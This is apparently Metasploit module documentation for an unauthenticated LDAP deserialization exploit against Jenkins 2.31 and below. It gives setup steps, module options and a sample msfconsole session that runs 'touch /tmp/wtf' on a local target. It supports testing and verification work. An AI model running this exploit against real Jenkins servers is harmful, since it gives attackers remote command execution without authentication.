2.0 KiB
2.0 KiB
Vulnerable Application
Jenkins 2.31 or below is vulnerable and can be downloaded from updates.jenkins-ci.org
This vulnerability does not require authentication and only HTTP access to the vulnerable application is required.
Verification Steps
- Download jenkins 2.31
- Install jenkins
java -jar jenkins.war - Start
msfconsole - Do:
use exploit/linux/misc/jenkins_ldap_deserialize - Do:
set RHOST [target host] - Do:
set PAYLOAD cmd/unix/generic - Do:
set CMD 'touch /tmp/wtf' - Do:
run - It should create /tmp/wtf on the target host.
Required Options
RHOST
The address of the jenkins server.
Options
RPORT
The http port for the jenkins server. (Defaults to 8080)
TARGETURI
The path to the target instance of Jenkins. (Defaults to /)
SRVHOST
The local address to listen for the LDAP request on. (Defaults to 127.0.0.1)
SRVPORT
The local port to listen for the LDAP request on. (Defaults to 1389)
LDAPHOST
The ldap host the exploit will connect to. Can be different from SRVHOST if in a environment where there is port forwarding. (Defaults to 127.0.0.1)
Scenarios
Example usage against a unix target running Jenkins 2.31.
msf > use exploit/linux/misc/jenkins_ldap_deserialize
msf exploit(jenkins_ldap_deserialize) > set TARGETURI /
TARGETURI => /
msf exploit(jenkins_ldap_deserialize) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(jenkins_ldap_deserialize) > set RPORT 8080
RPORT => 8080
msf exploit(jenkins_ldap_deserialize) > set PAYLOAD cmd/unix/generic
PAYLOAD => cmd/unix/generic
msf exploit(jenkins_ldap_deserialize) > set CMD 'touch /tmp/wtf'
CMD => touch /tmp/wtf
msf exploit(jenkins_ldap_deserialize) > run
[*] Exploit completed, but no session was created.